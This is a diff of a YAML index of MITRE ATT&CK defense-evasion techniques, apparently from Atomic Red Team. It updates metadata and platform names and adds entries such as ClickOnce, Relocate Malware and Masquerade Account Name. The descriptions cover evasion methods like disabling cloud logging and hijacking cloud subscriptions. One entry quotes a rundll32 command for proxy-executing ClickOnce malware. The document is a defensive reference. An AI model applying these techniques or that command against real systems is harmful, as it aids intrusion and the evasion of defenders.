       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests: []
   T1564.007:
@@ -11107,7 +11245,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11133,12 +11271,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11228,7 +11364,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -11286,12 +11421,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -11333,10 +11467,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -11360,18 +11493,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -11385,7 +11530,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -11397,20 +11542,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -11419,11 +11555,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11432,6 +11567,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -11441,6 +11577,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -11452,13 +11589,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -11503,9 +11640,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests: []
   T1564.003:
@@ -11588,18 +11722,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -11632,10 +11888,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -11672,40 +11927,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11714,20 +11939,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -11757,7 +12012,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -11800,8 +12055,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -11848,7 +12101,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -11914,12 +12167,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -11974,33 +12225,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
+  T1036.010:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
